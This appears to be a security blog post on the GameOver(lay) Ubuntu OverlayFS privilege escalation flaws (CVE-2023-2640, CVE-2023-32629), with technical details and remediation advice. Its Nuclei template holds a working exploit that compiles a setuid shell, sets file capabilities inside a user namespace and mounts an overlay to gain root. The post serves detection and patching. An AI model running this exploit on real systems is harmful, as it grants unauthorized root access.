-

3 min read

GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel

GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel

GameOver(lay) encompasses two significant vulnerabilities within the Ubuntu kernel, CVE-2023-2640, and CVE-2023-32629, each carrying a high-severity rating with CVSS scores of 7.8. These vulnerabilities pose a critical threat, potentially affecting around 40% of Ubuntu users. The vulnerability lies within the OverlayFS module of the Ubuntu kernel, enabling a local attacker to execute a privilege escalation attack, granting unauthorized elevated access to the system.

Technical Details

CVE-2023-2640: This vulnerability emerges from specific configurations within Ubuntu kernels. It occurs when an Ubuntu kernel includes both c914c0e27eb0 and the UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs modifications. An unprivileged user gains the ability to set privileged extended attributes on files mounted via OverlayFS. These attributes are then improperly applied to the upper files, bypassing the necessary security checks. This creates a loophole where unprivileged users can perform actions they typically wouldn't have permission to perform.

CVE-2023-32629: This is a local privilege escalation vulnerability present in Ubuntu's OverlayFS. The flaw resides in the ovl_copy_up_meta_inode_data function of OverlayFS, which incorrectly skips permission checks when executing ovl_do_setxattr. The crux of this vulnerability is the potential for an attacker to craft a special executable file endowed with scoped file capabilities. When the Ubuntu Kernel is tricked into copying this file to a location with un-scoped capabilities, it inadvertently grants root-like privileges to any user who executes the file. This vulnerability allows a local attacker to escalate their privileges to the highest level, gaining unfettered access to the system.

Nuclei Template

cli

1id: CVE-2023-2640
2
3info:
4  name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
5  author: princechaddha
6  severity: high
7  description: |
8    A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.
9  tags: packetstorm,cve,cve2023,kernel,ubuntu,linux,privesc,local
10
11self-contained: true
12code:
13  - engine:
14      - sh
15      - bash
16    source: |
17      id
18
19  - engine:
20      - sh
21      - bash
22    source: |
23      cd /tmp
24      echo '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n\nint main() {\n if (setuid(0) != 0) {\n fprintf(stderr, "\\x1b[31mFailed to set UID to 0.\\x1b[0m\\n");\n return 1;\n }\n\n printf("Entering \\x1b[36mprivileged\\x1b[0m shell...\\n");\n if (system("/bin/bash -p") == -1) {\n fprintf(stderr, "\\x1b[31mFailed to execute /bin/bash -p.\\x1b[0m\\n");\n return 1;\n }\n\n return 0;\n}' > test.c
25      gcc test.c -o test
26      unshare -rm sh -c "mkdir -p l u w m && cp test l/ && setcap cap_setuid+eip l/test && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/test && u/test && id;"
27
28    matchers:
29      - type: dsl
30        dsl:
31          - '!contains(code_1_response, "(root)")'
32          - 'contains(code_2_response, "(root)")'
33        condition: and

Timeline

The vulnerabilities were fixed by Ubuntu as of July 24, 2023, following responsible disclosure​​.

Remediation

Users are recommended to apply updates provided by Ubuntu to mitigate these vulnerabilities. Taking advantage of these vulnerabilities requires establishing a user namespace and an OverlayFS mount, hinting that attackers need local code execution capabilities on the targeted system, making remote exploitation unlikely​​.

References

Related stories

View all